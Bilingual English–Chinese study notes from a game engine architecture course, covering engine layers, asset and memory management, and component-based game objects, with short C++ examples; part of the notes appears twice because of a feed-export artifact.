    • C++ Reflection
      Expose variables and functions used in the editor. That is, the game creation tool will use a form of reflection (or similar) on the code provided by the developers, which then allows it to expose parts of it in editors for designers.

      公开编辑器中使用的变量和函数。也就是说,游戏创建工具将对开发人员提供的代码使用某种形式的反射(或类似形式),然后允许它在编辑器中向设计人员公开部分代码

    • Data Schema
      A data schema is the formal description of the structures which a system is working with.

      数据模式是系统正在使用的结构的正式描述。

    Online Gaming

    png

    • Lockstep synchronization

      锁步同步

    • State synchronization

      状态同步

    • Consistency

      一致性

    Advanced Technology

    png

    • Motion Matching

      动作匹配

      Motion Matching is a simple yet powerful way of animating characters in games. Compared to other methods, it doesn’t require very much manual work once you have a basic set-up. there is no need to structure clips in graphs, to carefully cut or synchronize them, or to explicitly create new transitions between status.

      动作匹配是一种简单而强大的游戏角色动画方式。与其他方法相比,一旦完成基本设置,它就不需要太多手动工作。无需在图表中构造剪辑、仔细剪切或同步它们,或显式地在状态之间创建新的转换。

    • Procedural Content Generation (PCG)

      程序内容生成(PCG)

      PCG is a method of creating data algorithmically as opposed to manually, typically through a combination of human-generated assets and algorithms coupled with computer-generated randomness and processing power.

      PCG 是一种通过算法而不是手动创建数据的方法,通常通过将人类生成的资产和算法与计算机生成的随机性和处理能力相结合。

    png

    • Data-Oriented Programming (DOP)

      面向数据的编程(DOP)

      DOP is an exciting new paradigm that eliminates the usual complexity caused by combining data and code into objects and classes. In DOP, you maintain application data in persistent generic data structures separated from the program’s code. You use general-purpose functions to manipulate the data without mutating it. This approach rids your applications of state-related bugs and makes your code much easier to understand and maintain.

      DOP 是一个令人兴奋的新范例,它消除了将数据和代码组合到对象和类中通常带来的复杂性。在 DOP 中,您可以在与程序代码分离的持久通用数据结构中维护应用程序数据。您可以使用通用函数来操作数据而不改变数据。这种方法可以消除应用程序中与状态相关的错误,并使您的代码更易于理解和维护。

    • Job System
      A job system manages multithreaded code by creating jobs instead of threads.

      作业系统通过创建作业而不是线程来管理多线程代码。

    png

    • Lumen
    Unreal Engine 5's new fully dynamic global illumination and reflections system that is designed for next-generation consoles. It renders diffuse interreflection with infinite bounces and indirect specular reflections in large, detailed environments at scales ranging from millimeters to kilometers.

      虚幻引擎 5 专为下一代游戏机设计的全新全动态全局照明和反射系统。它可以在大型、详细的环境中以毫米到公里的尺度呈现具有无限反射和间接镜面反射的漫反射。

    • Nanite
    Unreal Engine 5's new virtualized geometry system which uses a new internal mesh format and rendering technology to render pixel-scale detail and high object counts.

      虚幻引擎 5 的新虚拟几何系统使用新的内部网格格式和渲染技术来渲染像素级细节和高对象数量。

    Topic 6: COURSE LOGISTICS

    png

    ​参考书籍:Jason Gregory, “Game Engine Architecture”, 3rd or later editions

    第二节:引擎架构分层

    A Glance of Game Engine Layers

    Sea of Codes

    Where to begin?

    ​游戏引擎架构十分复杂,该从何开始研究?

    png

    ​课程认为游戏引擎可以分为五层,自上而下依次是:

    • Tool Layer

      工具层

    • Function Layer

      功能层

    • Resource Layer

      资源层

    • Core Layer

      核心层

    • Platform Layer

      平台层

    Tool Layer:给游戏开发者的平台

    Chain of Editors

    png

    Function Layer:实现游戏的各种基础功能

    Make It Visible, Movable and Playable

    ​使游戏内容可见、可动、可玩

    png

    • Animation

      动画

    • Physics

      物理

    • Rendering

      渲染

    • Camera, HUD and Input

      相机,HUD 和输入

    ​HUD 是 Heads-Up Display 的缩写,指的是游戏界面上用来显示各种信息的部分,通常位于屏幕的边缘或角落。HUD 可以包括玩家的健康值、能量条、地图、任务目标、物品栏等信息,以帮助玩家更好地了解游戏情况并进行操作。HUD 的设计可以根据游戏类型和风格而有所不同,有些游戏甚至允许玩家自定义 HUD 以满足其个人喜好。

    • Script, FSM and Al

      脚本,有限状态机和人工智能

    Resource Layer:管理游戏各种 assets。

    Data and Files

    png

    ​有多种文件格式需要游戏引擎去读取。

    Core Layer:类似操作系统,需要管理线程、内存等资源分配。

    Swiss Knife of Game Engine

    ​游戏引擎的瑞士刀

    png

    Platform Layer:让游戏编写者写出的游戏能够在不同平台中运行。

    Launch on Different Platforms

    ​在不同平台上启动

    png

    3rd Party Libraries:第三方库

    Middleware and 3rd Party Libraries

    png

    ​市面上已有多种轮子以实现某些功能。

    Explore Game Engine Layers

    Practice is the Best Way to Learn

    ​实践是学习的最好办法!我们从一个案例开始。

    png

    Simple Animated Character Challenge

    ​简单的动画角色挑战。我想设计一个动画系统,要求如下:

    • Create, animate and render a character

      创建、动画和渲染角色

    • Playable on selected hardware platforms

      可在选定的硬件平台上播放

    Resource-How to Access My Data

    资源 - 如何访问我的数据

    png

    • Offline Resource lmporting

      线下资源导入

    • Unify file access by defining a meta asset file format (i.e. .ast)

      通过定义元资产文件格式(即 .ast)来统一文件访问(对于 PSD、MAX、MAYA 这种类型的文件,可能包含了大量对游戏引擎来说的无用信息,应该去除。)

    • Assets are faster to access by importing preprocess

      通过导入预处理可以更快地访问资产

    • Build a composite asset file to refer to all resources

      构建复合资产文件以引用所有资源

    • GUID is an extra protection for references

      GUID 为资源引用提供了额外的保护

    Resource-Runtime Asset Manager

    ​资源运行时资产管理器

    png

    Runtime Resource Management

    ​运行时资源管理(游戏运行时需要加载/移除哪些资源)

    • A virtual file system to load/unload assets by path reference

      通过路径引用加载/卸载资源的虚拟文件系统

    • Manage asset lifespan and reference by handle system

      通过句柄(handle)系统管理资产的生命周期和引用,见下方示意
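
    ​A sketch of the handle idea referenced above (C++, illustrative names): gameplay code holds small index + generation handles rather than raw pointers, so the manager can unload or move an asset and any stale handle simply resolves to null.

    #include <cstdint>
    #include <string>
    #include <unordered_map>

    struct AssetHandle { uint32_t index; uint32_t generation; };
    struct AssetSlot   { std::string path; void* data = nullptr; uint32_t generation = 0; };

    class AssetManager {
        std::unordered_map<uint32_t, AssetSlot> slots_;
        uint32_t next_ = 0;
    public:
        AssetHandle load(const std::string& path) {
            uint32_t id = next_++;
            slots_[id] = { path, nullptr, 1 };     // real code would load the file here
            return { id, 1 };
        }
        void* resolve(AssetHandle h) {             // stale handle => nullptr, never a dangling pointer
            auto it = slots_.find(h.index);
            return (it != slots_.end() && it->second.generation == h.generation)
                 ? it->second.data : nullptr;
        }
        void unload(AssetHandle h) { slots_.erase(h.index); }
    };

    int main() {
        AssetManager mgr;
        AssetHandle h = mgr.load("models/drone.ast");
        mgr.unload(h);
        return mgr.resolve(h) == nullptr ? 0 : 1;
    }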

    Resource-Manage Asset Life Cycle

    ​资源管理资产生命周期

    png

    Memory management for Resources - life cycle

    ​资源的内存管理 - 生命周期

    • Different resources have different life cycles

      不同的资源有不同的生命周期

    • Limited memory requires release of loaded resources when possible

      有限的内存需要尽可能释放已加载的资源

    • Garbage collection and deferred loading is critical features

      垃圾收集和延迟加载是关键功能

    Function-How to Make the World Alive

    png

    ​功能层有这么多东西需要去实现。

    Function-Dive into Ticks

    png

    ​功能层必须在每个 tick 内完成 Logic、Input、Camera、Motor、Character Controller、Animation、Physics、Render、Network、I/O、Memory GC 等的处理。

    Function-Tick the Animation and Renderer

    ​对于动画和渲染器来说……

    png

    • In each tick (over-simplified version)

      在每个刻度中(过于简化的版本)

      • Fetch animation frame of character

        获取角色的动画帧

      • Drive the skeleton and skin of character

        驱动角色的骨骼和皮肤

      • Renderer process all rendering jobs in an iteration of render tick for each frame

        渲染器在每帧的渲染标记迭代中处理所有渲染作业

    Function-Heavy-duty Hotchpotch

    ​重型大杂烩

    png

    • Function Layer provides major function modules for the game engine

      功能层为游戏引擎提供主要功能模块

      • Object system (HUGE)

        对象系统(巨大)

    • Game Loop updates the systems periodically

      游戏循环定期更新系统

      • Game Loop is the key of reading codes of game engines

        游戏循环是读取游戏引擎代码的关键

    • Blur the boundary between engine and game

      模糊引擎和游戏之间的界限

      • Camera, character and behavior

        镜头、角色和行为

      • Design extendable engine API for programmers

        为程序员设计可扩展的引擎 API

    Function-Multi-Threading

    ​多线程

    png

    • Multi-core processors become the mainstream

      多核处理器成为主流

      • Many systems in game engine are built for parallelism

        游戏引擎中的许多系统都是为并行性而构建的

    Core-Math Library

    png

    ​一个数学库,实现渲染之类的功能。

    Core-Math Effciency

    png

    ​核心层要讲究效率。例如,标准库的 1.0f / sqrt(x) 精确但相对较慢,引擎中常换成近似却快得多的算法,见下方的经典示例。
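
    ​The classic example is the Quake III fast inverse square root, which trades a little accuracy for speed. Modern engines would use hardware intrinsics (e.g. SSE's reciprocal-sqrt) instead, but the trick still illustrates the point:

    #include <cstdint>
    #include <cstdio>
    #include <cstring>

    float fastInvSqrt(float x)
    {
        float half = 0.5f * x;
        uint32_t i;
        std::memcpy(&i, &x, sizeof(i));    // reinterpret the float's bits as an integer
        i = 0x5f3759df - (i >> 1);         // magic constant gives a good initial guess
        std::memcpy(&x, &i, sizeof(x));
        x = x * (1.5f - half * x * x);     // one Newton-Raphson step refines it
        return x;
    }

    int main()
    {
        std::printf("1/sqrt(4) ~ %f\n", fastInvSqrt(4.0f));  // close to 0.5
    }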

    Core -Data Structure and Containers

    ​处理数据结构

    png

    • Vectors, maps, trees, etc.

      向量、映射、树等

    • Customized outperforms STL

      定制优于 STL 的算法

    • Avoid fragmented memory!

      避免内存碎片!


    • Skeleton tree

      骨架树

    • Animation frame sequence

      动画帧序列

    Core-Memory Management

    ​核心内存管理

    • Major bottlenecks of game engine performance

      游戏引擎性能的主要瓶颈

      • Memory Pool / Allocator

        内存池/分配器

      • Reduce cache miss

        减少缓存未命中

      • Memory alignment

        内存对齐

    • Polymorphic Memory Resource (PMR)

      多态内存资源(PMR)

    png

    • Cache locality/diffusion

      缓存局部性/扩散

    • Memory Arena

      内存 Arena(线性分配器)


    • Put data together

      将数据放在一起

    • Access data in order

      按顺序访问数据

    • Allocate and de-allocate as a block

      作为块分配和取消分配
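
    ​A minimal linear arena tying the bullets above together: aligned pointer-bump allocation inside one pre-allocated block, with the whole frame's memory released in a single reset. A sketch, not production code.

    #include <cstddef>
    #include <cstdint>
    #include <vector>

    class Arena {
        std::vector<std::uint8_t> block_;
        std::size_t offset_ = 0;
    public:
        explicit Arena(std::size_t bytes) : block_(bytes) {}
        void* alloc(std::size_t size, std::size_t align = 16) {   // align must be a power of two
            std::size_t p = (offset_ + align - 1) & ~(align - 1); // memory alignment
            if (p + size > block_.size()) return nullptr;         // arena exhausted
            offset_ = p + size;
            return block_.data() + p;                             // contiguous => cache friendly
        }
        void reset() { offset_ = 0; }   // de-allocate everything as one block
    };

    int main() {
        Arena frameArena(1 << 20);          // e.g. 1 MiB per-frame arena
        void* a = frameArena.alloc(256);
        void* b = frameArena.alloc(64);
        frameArena.reset();                 // end of frame: all transient memory gone
        return (a && b) ? 0 : 1;
    }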

    Core-Foundation of Game Engine

    ​游戏引擎核心基础

    png

    • Core layers provide utilities needed in various function modules

      核心层提供各种功能模块所需的实用程序

    • Super high performance design and implementation

      超高性能设计与实现

    • High standard of coding

      高标准的编码

    Platform-Target on Different Platform

    ​不同平台上的平台目标

    Compatibility of different platforms, provides platform-independent services and information for upper layers

    ​不同平台的兼容性,为上层提供平台无关的服务和信息

    png

    • File system

      文件系统

      • Path: Slash/backslash, Environment variables

        路径:斜杠/反斜杠、环境变量

      • Directory Traversal

        目录遍历

    Platform-Graphics APl

    ​图形 API

    Render Hardware Interface (RHI)

    ​渲染硬件接口(RHI)

    • Abstract away the differences between GPU architectures and SDKs

      屏蔽不同 GPU 架构和 SDK 的差异

    • Automatic optimization of target platforms

      自动优化目标平台

    png

    ​在底层 API 上用 C++ 的虚函数再封装一层。

    Platform-Hardware Architecture

    ​硬件架构

    png

    ​平台层要适应不同种硬件架构。

    Tool-Allow Anyone to Create Game

    ​允许任何人创建游戏

    png

    Unleash the Creativity

    ​释放创造力。创造对游戏开发者友好的开发环境。

    • Build upon game engine

      基于游戏引擎构建

    • Create, edit and exchange game play assets

      创建、编辑和交换游戏资产

    Flexible of coding languages

    ​灵活的编码语言

    Tool-Digital Content Creation

    png

    Asset Conditioning Pipeline

    ​资产调整管道

    Why Layered Architecture?

    png

    Decoupling and Reducing Complexity

    ​解耦并降低复杂性

    • Lower layers are independent from upper layers

      下层独立于上层

    • Upper layers don’t know how lower layers are implemented

      上层不知道下层是如何实现的

    Response for Evolving Demands

    ​响应不断变化的需求

    • Upper layers evolve fast, but lower layers are stable

      上层发展很快,但下层稳定

    Mini Engine-Pilot

    ​课程特意设计的小游戏引擎。

    Neat PILOT Engine

    ​整洁的 PILOT 引擎

    png

    Build by C /C++

    ​由 C/C++ 构建

    • Runtime: ~13,000 lines

      Runtime(运行时代码):约 13,000 行

    • Editor: ~2,000 lines

      编辑器:约 2,000 行

    Follow Engine Layers

    ​遵循引擎分层

    • Source code still improving

      源代码仍在改进

    Support Platform

    ​支持平台

    • Windows
    • Linux
    • macOS (working on M1)

    PILOT Editor and Runtime

    ​编辑器和运行时

    Basic Editing

    ​基础编辑

    • Add/Delete objects

      添加/删除对象

    • Move/Scale/Rotate objects

      移动/缩放/旋转对象

    Simple Functions

    ​简单的功能

    • Character control

      角色控制

    • Camera

      相机

    png

    ​这个游戏引擎还引入了 ECS。

    第三节:如何构建游戏世界

    How to build a game world?

    • What does a game world consist of?

      游戏世界由什么组成?

    • How should we describe these things?

      我们该如何描述这些事情呢?

    • How are these things organized?

      这些东西是如何组织的?

    Dynamic Game Objects

    png

    ​假设我想创建一个射击游戏场景,我设计一些可以随游戏进程而改变的 GameObject(GO)。

    Static Game Objects

    png

    ​再设计一些不可随游戏进程改变(游戏生成时长啥样,就是啥样)的 GO。

    Environments

    png

    ​由地编生成的环境。

    Other Game Objects

    png

    ​还有一些或许不可见的东西,比如空气墙,触发区域,特定规则,导航网络等。

    Everything is a Game Object

    png

    ​这些东西都可称之为 Game Object(GO)。

    How to Describe a Game Object?

    png

    ​我们该如何描述一个 GO 呢?假如,我们想要一个 drone 无人机。

    How Do We Describe a Drone in Reality?

    ​现实环境中,如何描述一个无人机?

    ​Properties and behaviors!

    • Shape (property)

      形状(属性)

    • Position (property)

      位置(属性)

    • Move (behavior)

      移动(行为)

    • Capacity of battery (property)

      电池容量(属性)

    • Etc.

    Game Object

    png

    ​将 property 用变量定义,behavior 用函数定义。

    class Drone
    {
    public:
    /* Properties */
    Vector3 position;
    float health;
    float fuel;
    ...
    /* Bebavior */
    void move();
    void scout();
    ...
    };

    Drone vs. Armed Drone

    png

    ​这个时候我们想设计一个战斗无人机,比起一般无人机,多了 ammo 弹药的 property 和 fire 的 behaviour。

    Game Object

    • Inheritance

      继承

    png

    ​使用集成的方法,让 ArmeDrone 继承 Drone 类,然后写上 ammo 弹药的 property 和 fire 的 behaviour 的定义。

    No Perfect Classification in the Game World!

    png

    ​但当继承派生的类变得复杂时,简单的继承就不太好使了。

    Component Base

    png

    png

    • Component Composition in the Real World

      现实世界中的组件构成

    ​将一个实体拆分成各个组件再操作!

    Components of a Drone

    png

    ​对于我们定义的无人机,我们将它拆分成多个 components:

    • Transform 变换
    • Motor 发动机
    • Model 模型
    • AI
    • Animations 动画
    • Physics 物理

    png

    Component

    • Drone vs. Armed Drone

    png

    ​此时,如果我们在无人机的基础上想要改成战斗机,只需修改其中的部分 components 即可。

    Components in Commercial Engines

    png

    ​在 Unity 和 UE 两大商业引擎中,也使用了 components 的思想

    Takeaways

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    How to Make the World Alive?

    ​如何让世界运行起来?

    Object-based Tick

    png

    ​Tick 相当于游戏世界中的普朗克时间。

    ​基于对象的 tick,每个 Tick 中分别处理好各个 GO 的逻辑。

    Component-based Tick

    png

    ​基于组件的 Tick,依次处理好各个 component 的逻辑。

    Object-based Tick vs. Component-based Tick

    png

    • Object-based tick

      基于对象的刻度

      • Simple and intuitive

        简单直观

      • Easy to debug

        易于调试

    png

    • Component-based tick

      基于组件的刻度

      • Parallelized processing

        并行处理

      • Reduced cache miss

        减少缓存未命中

    ​更高效!

    How to Explode an Ammo in a Game?

    ​如何处理游戏中弹药爆炸的逻辑?

    Hardcode

    png

    ​给炸弹爆炸时写一个函数,判断周围 GO 的类型然后逐个写逻辑。

    Events

    png

    ​炸弹爆炸时分发一个消息,各个 GO 接收到消息后执行逻辑。

    • Message sending and handling

      消息发送和处理

    • Decoupling event sending and handling

      解耦事件发送和处理

    ​这么做耦合度低,被普遍采用。

    Events Mechanism in Commercial Engines

    ​商业引擎中的事件机制

    png

    ​Unity 和 UE 中都普遍用到了这样的机制。

    How to Manage Game Objects?

    ​如何管理 GO?

    Scene Management

    png

    • Game objects are managed in a scene

      游戏对象在场景中管理

    • Game object query

      游戏对象查询

      • By unique game object lD.

        通过独特的游戏对象 ID。

      • By object position

        按物体位置

    png

    ​假设一个炮弹爆炸派发了一个事件,要让游戏中的所有 GO 接受这个事件并处理(是否在爆炸范围内),性能太低,需要作出一定的空间划分。

    • Simple space segmentation

      简单的空间划分

    png

    • Segmented space by object clusters

      按对象簇分割空间

    • Hierarchical segmentation

      分层细分

    png

    • Spatial Data Structures

      空间数据结构

    png

    ​划分空间的各个算法:

    • Bounding Volume Hierarchies (BVH)

      边界体积层次结构 (BVH)

    • Binary Space Partitioning (BSP)

      二进制空间分区(BSP)

    • Octree

      八叉树

    • Scene Graph

      场景图

    Takeaways

    • Everything is an object

      一切都是对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    • States of game objects are updated in tick loops

      游戏对象的状态在滴答循环中更新

    • Game objects interact with each other via event mechanism

      游戏对象通过事件机制相互交互

    • Game objects are managed in a scene with efficient strategies

      游戏对象在场景中以有效的策略进行管理

    png

    ​对于一些存在父子层级关系的 GO。

    png

    ​Animation、Motor 和 Physics 三个 components 相互影响,如果互相派发消息,性能会不佳。

    png

    Immediate Event Sending or not

    ​是否立即发送事件

    ​可以设计一个“邮局”,收发消息由这个邮局控制,提升性能!

    ]]>
    + 资源

    课程

    第一节:游戏引擎导论

    OVERVIEW OF GAME ENGINE

Game: Miracle of Modern Computer Technology

    ​游戏:现代计算机技术的奇迹

Game Engine: The Diamond on the Crown

    ​游戏引擎:皇冠上的钻石

    ​游戏引擎中所涉及的技术太多了。

    Topic 1: WHY WE NEED TO LEARN

    Game Engine is the Foundation of Virtual World

    ​游戏引擎是虚拟世界的基础

    游戏引擎除了做游戏,还可以干这些事情:

    • METAHUMAN

      拟人

    • CINEMATIC & ANIMATION

      电影与动画

    • SIMULATION

      模拟(军事)

    • DIGITAL TWIN

      数字孪生

    Topic 2: HISTORY OF GAME ENGINE

    Early Age of Video Games

    png

    ​早期游戏:红白机,超级马里奥,坦克大战,魂斗罗。

    Father of Game Engine

    png

• John Carmack

John conceived and executed a new way of organizing the components of computer games by separating execution of core functionality by the game engine from the creative assets that filled the play space and content of a specific game title.

    ​约翰构思并实施了一种组织计算机游戏组件的新方法,将游戏引擎执行的核心功能与填充特定游戏标题的游戏空间和内容的创意资产分开。

    ​这个人被称之为游戏引擎之父,让不同游戏间代码可以互用。

    • Wolfenstein 3D (1992)

    “Father of 3D shooters” and first demonstration of game engine application

    ​“3D 射击之父”暨游戏引擎应用首次演示

    • Doom

    png

Along with its predecessor Wolfenstein 3D, Doom defined the FPS genre and inspired numerous similar games, often called the Doom clones. It was the first game distributed online, and it pioneered technologies including 3D graphics, networked multiplayer gaming, and support for custom modifications via packaged WAD files.

    ​与其前身《德军总部 3D》一起,《毁灭战士》定义了 FPS 类型,并启发了许多类似的游戏,通常被称为《毁灭战士》克隆游戏。它是第一款在线发行游戏,它开创了包括 3D 图形、网络多人游戏以及通过打包的 WAD 文件进行自定义修改的支持等技术。

    • Engine License

In 1994, id Software licensed the Doom engine to Raven, which built a successful game, ShadowCaster, based on it.

    ​1994 年,ID Software 将 Doom 引擎授权给 Raven,Raven 基于它打造了一款成功的游戏 ShadowCaster。

    Early Age of Modern Game Engine

    png

    • Quake

    • Unlike the Doom Engine, the Quake engine offered full real-time 3D rendering and supported early 3D acceleration through OpenGL.

      与 Doom 引擎不同,Quake 引擎提供完整的实时 3D 渲染,并通过 OpenGL 支持早期 3D 加速。

    png

    A game engine is a software framework primarily designed for the development of video games, which normally includes relevant libraries and support programs

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,通常包括相关的库和支持程序。

    Family of Game Engines

    png

    游戏引擎有三大类:

    • Commercial Engine

      商用引擎

    • In-house Engine

      内部引擎(寒霜等,不公开)

    • Free Engine

      免费引擎

    Middleware of Game Engine

    png

    ​游戏引擎中可能用到的框架,用于解决某些特定问题。

Topic 3: WHAT IS GAME ENGINE

    What’s Game Engine?

    ​A game engine is a software framework primarily designed for the development of video games, and generally includes relevant libraries and support programs. The “engine” terminology is similar to the term “software engine” used in the software industry.
    ​Game engine can also refer to the development software utilizing this framework, typically offering a suite of tools and features for developing games.
​Developers can use game engines to construct games for video game consoles and other types of computers. The core functionality typically provided by a game engine may include a rendering engine (“renderer”) for 2D or 3D graphics, a physics engine or collision detection (and collision response), sound, scripting, animation, artificial intelligence, networking, streaming, memory management, threading, localization support, scene graph, and video support for cinematics. Game engine implementers often economize on the process of game development by reusing/adapting, in large part, the same game engine to produce different games or to aid in porting games to multiple platforms.

    ​游戏引擎是主要为视频游戏开发而设计的软件框架,一般包括相关的库和支持程序。“引擎”术语类似于软件行业中使用的术语“软件引擎”。
    ​游戏引擎也可以指利用该框架的开发软件,通常提供一套用于开发游戏的工具和功能。
    ​开发人员可以使用游戏引擎为视频游戏机和其他类型的计算机构建游戏。游戏引擎通常提供的核心功能可能包括用于 2D 或 3D 图形的渲染引擎(“渲染器”)、物理引擎或碰撞检测(和碰撞响应)、声音、脚本、动画、人工智能、网络、流媒体、内存管理、线程、本地化支持、场景图和电影视频支持。游戏引擎实现者通常通过在很大程度上重用/改编相同的游戏引擎来制作不同的游戏或帮助将游戏移植到多个平台,从而节省游戏开发的过程。

    ​Wiki 里对游戏引擎的解释十分复杂。

    Our Definition: What’s Game Engine?

    • Technology foundation of the Matrix

      黑客帝国的技术基础

    • Productivity tools of creation

      创造的生产力工具

    • The Art of complexity

      复杂性的艺术

    Infinite Details of the World

    ​天地有大美而不言

    Complexity of Simulation by 0/1

    png

    ​用计算机的 0 和 1 表示这些东西,太难了

    Game Engine is Far Beyond Rendering

    png

    ​渲染只是游戏引擎中的一小部分。

    God with Limited Power in Realtime

    ​上帝所创造的真实世界拥有无尽的算力。计算机所创造的世界受算力影响,需要在 1/帧率 时间内完成计算,因此优化是一个大问题。

    Toolchain for Creators

    png

    ​给创造者的工具——游戏引擎。

    Developer Platform

    • For Programmer

      对于程序员

      • Expandable API interfaces allow programmers to define various kinds of gameplay without changing the core.

        可扩展的 API 接口允许程序员在不改变核心的情况下定义各种游戏玩法。

    • For Studio

      对于工作室

      • Enable hundreds of developers with different work streams to collaborate smoothly.

        让数百名具有不同工作流程的开发人员顺畅地协作。

    Update the Engine in the Air

    ​游戏引擎更新的过程中要保证兼容性,相当于在飞行过程中更换飞机零件。

    Yes, We Are…

    ​是的,我们是…

    The Creator and Operator of This Ugly Monster.

    ​这个丑陋怪物的创造者和操纵者。

    But Future Will be Even More Difficult.

    ​但未来会更加困难。

    Topic 4: HOW TO STUDY

Game Engine Technology Covers All Major Areas of Computer Science

    ​游戏引擎技术涵盖计算机科学的所有主要领域。

    png

    ​多读书多看报。

    Focus on the Main Road by Building the Framework

    ​游戏引擎领域范围太广了,课程只按主路进行。

    Topic 5: COURSE CONTENT

    Basic Elements

    png

    • Engine structure and layers

引擎结构和分层

    • Data organization and management

      数据组织和管理

    png

    Rendering

    png

    • Model, material, shader, texture
    • Light and shadow
    • Render pipeline
    • Sky, terrain, etc

    Animation

    png

    • Basic concepts of animation

      动画的基本概念

    • Animation structure and pipeline

      动画结构和流程

    Physics

    png

    • Basic concepts of Physics System

      物理系统的基本概念

    • Gameplay applications

      游戏应用程序

    • Performance optimization

      性能优化

    Gameplay

    png

    • Event System

      事件系统

    • Scripts System

      脚本系统

    • Graph Driven

      图驱动(蓝图)

    Misc. Systems

    ​杂项系统

    png

    • Effects

    • Navigation

    • Camera

    Toolchain

    ​工具链

    png

    • C++ Reflection
      Expose variables and functions used in the editor. That is, the game creation tool will use a form of reflection (or similar) on the code provided by the developers, which then allows it to expose parts of it in editors for designers.

公开编辑器中使用的变量和函数。也就是说,游戏创建工具会对开发人员提供的代码使用某种形式的反射(或类似机制),从而在编辑器中向设计师公开其中的一部分代码。(见本列表后的代码示意。)

    • Data Schema
      A data schema is the formal description of the structures which a system is working with.

      数据模式是系统正在使用的结构的正式描述。
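​下面是“宏注册式”反射的一个极简草图(纯属示意,类型名与宏名均为本文假设,并非某个真实引擎的 API):把成员变量登记到“名字 -> 读写访问器”的表中,编辑器即可按名字枚举并读写属性。

#include <functional>
#include <map>
#include <string>

// 属性 = 一对按名字查到的读/写访问器(这里只演示 float 属性)
struct Property {
    std::function<float(void*)>       get;
    std::function<void(void*, float)> set;
};

struct TypeInfo {
    std::map<std::string, Property> properties;
};

// 把某个类型的某个 float 成员登记到 info.properties 里
#define REFLECT_FLOAT(Type, member)                                      \
    info.properties[#member] = Property{                                 \
        [](void* obj) { return static_cast<Type*>(obj)->member; },       \
        [](void* obj, float v) { static_cast<Type*>(obj)->member = v; }}

struct DroneData { float health = 100.f; float fuel = 50.f; };

TypeInfo makeDroneTypeInfo() {
    TypeInfo info;
    REFLECT_FLOAT(DroneData, health); // 在编辑器中显示为可编辑的 "health"
    REFLECT_FLOAT(DroneData, fuel);
    return info;
}

​编辑器拿到 TypeInfo 后,即可遍历 properties 表,为每个属性生成可编辑的控件。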

    Online Gaming

    png

    • Lockstep synchronization

      锁步同步

    • State synchronization

      状态同步

    • Consistency

      一致性

    Advanced Technology

    png

    • Motion Matching

      动作匹配

Motion Matching is a simple yet powerful way of animating characters in games. Compared to other methods, it doesn’t require much manual work once you have a basic set-up. There is no need to structure clips in graphs, to carefully cut or synchronize them, or to explicitly create new transitions between states.

      动作匹配是一种简单而强大的游戏角色动画方式。与其他方法相比,一旦完成基本设置,它就不需要太多手动工作。无需在图表中构造剪辑、仔细剪切或同步它们,或显式地在状态之间创建新的转换。

    • Procedural Content Generation (PCG)

      程序内容生成(PCG)

      PCG is a method of creating data algorithmically as opposed to manually, typically through a combination of human-generated assets and algorithms coupled with computer-generated randomness and processing power.

      PCG 是一种通过算法而不是手动创建数据的方法,通常通过将人类生成的资产和算法与计算机生成的随机性和处理能力相结合。

    png

    • Data-Oriented Programming (DOP)

      面向数据的编程(DOP)

      DOP is an exciting new paradigm that eliminates the usual complexity caused by combining data and code into objects and classes. In DOP, you maintain application data in persistent generic data structures separated from the program’s code. You use general-purpose functions to manipulate the data without mutating it. This approach rids your applications of state-related bugs and makes your code much easier to understand and maintain.

      DOP 是一个令人兴奋的新范例,它消除了将数据和代码组合到对象和类中通常带来的复杂性。在 DOP 中,您可以在与程序代码分离的持久通用数据结构中维护应用程序数据。您可以使用通用函数来操作数据而不改变数据。这种方法可以消除应用程序中与状态相关的错误,并使您的代码更易于理解和维护。

    • Job System
      A job system manages multithreaded code by creating jobs instead of threads.

      作业系统通过创建作业而不是线程来管理多线程代码。

    png

    • Lumen
Unreal Engine 5’s new fully dynamic global illumination and reflections system that is designed for next-generation consoles. It renders diffuse interreflection with infinite bounces and indirect specular reflections in large, detailed environments at scales ranging from millimeters to kilometers.

      虚幻引擎 5 专为下一代游戏机设计的全新全动态全局照明和反射系统。它可以在大型、详细的环境中以毫米到公里的尺度呈现具有无限反射和间接镜面反射的漫反射。

    • Nanite
Unreal Engine 5’s new virtualized geometry system which uses a new internal mesh format and rendering technology to render pixel scale detail and high object counts.

      虚幻引擎 5 的新虚拟几何系统使用新的内部网格格式和渲染技术来渲染像素级细节和高对象数量。

    Topic 6: COURSE LOGISTICS

    png

​参考书籍:Jason Gregory, “Game Engine Architecture”, 3rd or later editions

    第二节:引擎架构分层

    A Glance of Game Engine Layers

    Sea of Codes

    Where to begin?

    ​游戏引擎架构十分复杂,该从何开始研究?

    png

    ​课程认为游戏引擎可以分为五层,自上而下依次是:

    • Tool Layer

      工具层

    • Function Layer

      功能层

    • Resource Layer

      资源层

    • Core Layer

      核心层

    • Platform Layer

      平台层

    Tool Layer:给游戏开发者的平台

    Chain of Editors

    png

    Function Layer:实现游戏的各种基础功能

Make It Visible, Movable and Playable

    ​使游戏内容可见、可移动和可播放

    png

    • Animation

      动画

    • Physics

      物理

    • Rendering

      渲染

    • Camera, HUD and Input

      相机,HUD 和输入

    ​HUD 是 Heads-Up Display 的缩写,指的是游戏界面上用来显示各种信息的部分,通常位于屏幕的边缘或角落。HUD 可以包括玩家的健康值、能量条、地图、任务目标、物品栏等信息,以帮助玩家更好地了解游戏情况并进行操作。HUD 的设计可以根据游戏类型和风格而有所不同,有些游戏甚至允许玩家自定义 HUD 以满足其个人喜好。

• Script, FSM and AI

      脚本,有限状态机和人工智能

    Resource Layer:管理游戏各种 assets。

    Data and Files

    png

    ​有多种文件格式需要游戏引擎去读取。

    Core Layer:类似操作系统,需要管理线程、内存等资源分配。

    Swiss Knife of Game Engine

    ​游戏引擎的瑞士刀

    png

    Platform Layer:让游戏编写者写出的游戏能够在不同平台中运行。

    Launch on Different Platforms

    ​在不同平台上启动

    png

3rd Party Libraries:第三方库

    Middleware and 3rd Party Libraries

    png

    ​市面上已有多种轮子以实现某些功能。

    Explore Game Engine Layers

    Practice is the Best Way to Learn

    ​实践是学习的最好办法!我们从一个案例开始。

    png

    Simple Animated Character Challenge

    ​简单的动画角色挑战。我想设计一个动画系统,要求如下:

    • Create, animate and render a character

      创建、动画和渲染角色

    • Playable on selected hardware platforms

      可在选定的硬件平台上播放

    Resource-How to Access My Data

    资源 - 如何访问我的数据

    png

• Offline Resource Importing

      线下资源导入

